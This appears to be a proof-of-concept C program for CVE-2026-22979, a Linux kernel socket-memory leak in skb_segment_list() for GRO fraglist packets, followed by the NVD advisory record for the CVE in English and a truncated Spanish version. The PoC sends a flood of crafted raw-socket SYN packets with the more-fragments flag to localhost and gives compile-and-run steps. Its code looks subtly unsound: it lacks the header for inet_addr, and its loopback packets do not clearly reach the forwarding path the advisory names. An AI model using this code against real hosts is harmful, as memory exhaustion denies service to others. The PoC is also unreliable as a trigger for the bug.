CVE-2026-22979

// CVE-2026-22979 PoC - Linux Kernel Memory Leak via GRO Fraglist // This PoC demonstrates triggering skb_segment_list memory leak // Requires: Linux kernel with GRO enabled, low-privilege local access #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netinet/ip.h> #include <netinet/tcp.h> // Kernel configuration required: // CONFIG_NET_GRO_FRAGLIST=y // CONFIG_DEBUG_KMEMLEAK=y int main(int argc, char *argv[]) { int sock_fd; struct sockaddr_in target; char packet[4096]; struct iphdr *ip; struct tcphdr *tcp; printf("CVE-2026-22979 PoC - GRO Fraglist Memory Leak\n"); printf("Target: Linux kernel skb_segment_list()\n"); // Create raw socket for packet injection sock_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if (sock_fd < 0) { perror("socket creation failed"); return 1; } // Enable IP_HDRINCL to manually construct headers int one = 1; setsockopt(sock_fd, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)); memset(&target, 0, sizeof(target)); target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr("127.0.0.1"); target.sin_port = htons(8080); // Construct fraglist GSO packet memset(packet, 0x41, sizeof(packet)); ip = (struct iphdr *)packet; tcp = (struct tcphdr *)(packet + sizeof(struct iphdr)); // IP header for fraglist GSO ip->ihl = 5; ip->version = 4; ip->tos = 0; ip->tot_len = htons(sizeof(packet)); ip->id = htons(0x1234); ip->frag_off = htons(IP_MF); // More fragments flag ip->ttl = 64; ip->protocol = IPPROTO_TCP; ip->saddr = inet_addr("192.168.1.100"); ip->daddr = inet_addr("127.0.0.1"); ip->check = 0; // TCP header tcp->source = htons(12345); tcp->dest = htons(8080); tcp->seq = htonl(1000); tcp->ack_seq = htonl(2000); tcp->doff = 5; tcp->fin = 0; tcp->syn = 1; tcp->rst = 0; tcp->psh = 0; tcp->ack = 0; tcp->window = htons(65535); tcp->check = 0; tcp->urg_ptr = 0; printf("Sending GRO fraglist packets to trigger memory leak...\n"); printf("Monitor with: echo scan > /sys/kernel/debug/kmemleak\n"); printf("Check with: cat /sys/kernel/debug/kmemleak\n"); // Send multiple packets to trigger GRO aggregation and segmentation for (int i = 0; i < 1000; i++) { if (sendto(sock_fd, packet, sizeof(packet), 0, (struct sockaddr *)&target, sizeof(target)) < 0) { perror("sendto failed"); break; } usleep(1000); // Small delay between packets if (i % 100 == 0) { printf("Sent %d packets...\n", i); } } close(sock_fd); printf("PoC execution complete. Check kmemleak for unreleased objects.\n"); printf("Expected: unreferenced objects with comm 'ping' or socket allocations\n"); return 0; } /* * Verification Steps: * 1. Compile: gcc -o cve_poc cve_poc.c * 2. Enable kmemleak: echo scan > /sys/kernel/debug/kmemleak * 3. Run PoC: ./cve_poc * 4. Check leaks: cat /sys/kernel/debug/kmemleak | grep -A 10 "unreferenced object" * 5. Look for socket allocations with comm "ping" or similar * * Note: This is a proof-of-concept for educational purposes. * Actual exploitation requires specific kernel configuration and network setup. */

{"cve": {"id": "CVE-2026-22979", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-23T16:15:53.893", "lastModified": "2026-02-26T23:37:06.353", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: fix memory leak in skb_segment_list for GRO packets\n\nWhen skb_segment_list() is called during packet forwarding, it handles\npackets that were aggregated by the GRO engine.\n\nHistorically, the segmentation logic in skb_segment_list assumes that\nindividual segments are split from a parent SKB and may need to carry\ntheir own socket memory accounting. Accordingly, the code transfers\ntruesize from the parent to the newly created segments.\n\nPrior to commit ed4cccef64c1 (\"gro: fix ownership transfer\"), this\ntruesize subtraction in skb_segment_list() was valid because fragments\nstill carry a reference to the original socket.\n\nHowever, commit ed4cccef64c1 (\"gro: fix ownership transfer\") changed\nthis behavior by ensuring that fraglist entries are explicitly\norphaned (skb->sk = NULL) to prevent illegal orphaning later in the\nstack. This change meant that the entire socket memory charge remained\nwith the head SKB, but the corresponding accounting logic in\nskb_segment_list() was never updated.\n\nAs a result, the current code unconditionally adds each fragment's\ntruesize to delta_truesize and subtracts it from the parent SKB. Since\nthe fragments are no longer charged to the socket, this subtraction\nresults in an effective under-count of memory when the head is freed.\nThis causes sk_wmem_alloc to remain non-zero, preventing socket\ndestruction and leading to a persistent memory leak.\n\nThe leak can be observed via KMEMLEAK when tearing down the networking\nenvironment:\n\nunreferenced object 0xffff8881e6eb9100 (size 2048):\n comm \"ping\", pid 6720, jiffies 4295492526\n backtrace:\n kmem_cache_alloc_noprof+0x5c6/0x800\n sk_prot_alloc+0x5b/0x220\n sk_alloc+0x35/0xa00\n inet6_create.part.0+0x303/0x10d0\n __sock_create+0x248/0x640\n __sys_socket+0x11b/0x1d0\n\nSince skb_segment_list() is exclusively used for SKB_GSO_FRAGLIST\npackets constructed by GRO, the truesize adjustment is removed.\n\nThe call to skb_release_head_state() must be preserved. As documented in\ncommit cf673ed0e057 (\"net: fix fraglist segmentation reference count\nleak\"), it is still required to correctly drop references to SKB\nextensions that may be overwritten during __copy_skb_header()."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nnet: corrige fuga de memoria en skb_segment_list para paquetes GRO\n\nCuando se llama a skb_segment_list() durante el reenvío de paquetes, maneja paquetes que fueron agregados por el motor GRO.\n\nHistóricamente, la lógica de segmentación en skb_segment_list asume que los segmentos individuales se dividen de un SKB padre y pueden necesitar llevar su propia contabilidad de memoria de socket. En consecuencia, el código transfiere truesize del padre a los segmentos recién creados.\n\nAntes del commit ed4cccef64c1 ('gro: corrige transferencia de propiedad'), esta resta de truesize en skb_segment_list() era válida porque los fragmentos aún llevaban una referencia al socket original.\n\nSin embargo, el commit ed4cccef64c1 ('gro: corrige transferencia de propiedad') cambió este comportamiento al asegurar que las entradas de fraglist se huérfanan explícitamente (skb-&gt;sk = NULL) para evitar un huérfano ilegal más adelante en la pila. Este cambio significó que la carga completa de memoria del socket permaneció con el SKB de cabecera, pero la lógica de contabilidad correspondiente en skb_segment_list() nunca se actualizó.\n\nComo resultado, el código actual añade incondicionalmente el truesize de cada fragmento a delta_truesize y lo resta del SKB padre. Dado que los fragmentos ya no se cargan al socket, esta resta resulta en un recuento insuficiente efectivo de memoria cuando se libera la cabecera. Esto hace que sk_wmem_alloc permanezca distinto de cero, impidiendo la destrucción del socket y provocando una fuga de memoria persistente.\n\nLa fuga puede observarse a través de KMEMLEAK al desmantelar el entorno de red:\n\nobjeto sin referencia 0xffff8881e6eb9100 (tamaño 2048):\n comm \"ping\", pid 6720, jiffies 4295492526\n rastreo:\n kmem_cache_alloc_noprof+0x5c6/0x800\n sk_prot_alloc+0x5b/0x220\n sk_alloc+0x35/0xa00\n inet6_create.part.0+0x303/0x10d0\n __sock_create+0x248/0x640\n __sys_socket+0x11b/0x1d0\n\nDado que skb_segment_list() se utiliza exclusivamente para paquetes SKB_GSO_FRAGLIST construidos por GRO, el ajuste de truesize se elimina.\n\nLa llamada a skb_release_head_state() debe conservarse. Como se documenta en el commit cf673ed0e057 ('net: corrige fuga de recuento de referencias de segmentación de fraglist'), todavía es necesario para descartar correctamente las referen ... (truncated)